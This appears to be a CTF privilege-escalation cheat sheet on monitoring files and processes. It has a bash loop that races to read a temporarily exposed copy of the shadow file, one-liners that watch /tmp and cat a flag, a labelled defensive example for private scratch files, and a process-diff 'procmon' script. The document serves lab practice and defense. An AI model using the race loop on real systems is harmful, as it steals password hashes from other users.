Monitor Files

Method 1 - ls loop

An app escalates your session to root and saves the shadow file in /tmp, but then deletes it. The loop below polls /tmp/SSH and prints the file during the window before it is deleted.

CTF example: BetterSSH.py. Thanks: Pivonka

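#!/bin/bash

# Poll /tmp/SSH with no delay so a short-lived file is read before it is deleted.
while true
do
    # Names of any entries currently in the directory (empty if none or missing)
    files=$(ls -1A /tmp/SSH 2>/dev/null)
    if [ -n "$files" ]
    then
        # Print each entry; quoting handles spaces in file names
        while IFS= read -r file
        do
            cat "/tmp/SSH/$file"
        done <<< "$files"
        exit 0
    fi
done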
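
The window this loop relies on exists only while the sensitive copy sits in a location other users can list and read. The following is an added example, not code from the original page or from BetterSSH.py: it shows a scratch copy kept in a private directory and a check for exposure. The function names and the sample record are hypothetical, and GNU `mktemp` and `stat` are assumed.

```shell
#!/bin/bash
# Added example: hardened handling of a sensitive scratch copy.
# All function names are hypothetical; sample data is constructed.

# Create a private scratch directory. mktemp -d gives it mode 0700 and an
# unpredictable name, so other local users cannot list or enter it.
make_private_dir() {
  mktemp -d "${1:-${TMPDIR:-/tmp}}/scratch.XXXXXXXXXX"
}

# Write stdin to <dir>/<name> with mode 0600 and print the resulting path.
# umask is changed inside a subshell so the caller's umask is untouched.
write_secret() {
  ( umask 077 && cat > "$1/$2" ) || return 1
  printf '%s\n' "$1/$2"
}

# Succeed if group or other have any permission bit on the path, which is
# the condition a polling reader from another account depends on.
exposed_to_others() {
  mode=$(stat -c '%a' "$1") || return 2
  case "$mode" in
    0|*00) return 1 ;;   # no group/other bits set
    *)     return 0 ;;
  esac
}

# Demo with a constructed record (not a real shadow entry).
demo() {
  dir=$(make_private_dir) || return 1
  file=$(printf 'user:CONSTRUCTED-HASH:19000::::::\n' | write_secret "$dir" copy)
  if exposed_to_others "$dir" || exposed_to_others "$file"; then
    result="exposed"
  else
    result="private"
  fi
  rm -rf -- "$dir"   # remove the copy and its directory when done
  printf '%s\n' "$result"
}

demo
```

Running `exposed_to_others` against `/tmp/SSH` and the files an application drops there is a quick audit for this class of exposure.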

Method 2 - while cat

Watch for the latest entry in /tmp. Use sleep 0 if you want it faster.

Watch for a new file:
> while : ; do ls -At /tmp | head -n1; sleep 1; done

Cat the new file:
> while : ; do cat '/tmp/flag.txt' 2>/dev/null; sleep 1; done

Watch jobs

> watch -n 1 'systemctl list-timers'

Watch Proc - "procmon":

  • procmon.sh ...from ippsec on ninevehHTB

  • bash ./procmon.sh

  • REF: cron jobs

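#!/bin/bash
# Print processes that appear (>) or disappear (<) between one-second snapshots.
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
  new_process=$(ps -eo command)
  # Keep only the added/removed lines from the diff output
  diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
  sleep 1
  old_process=$new_process
done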
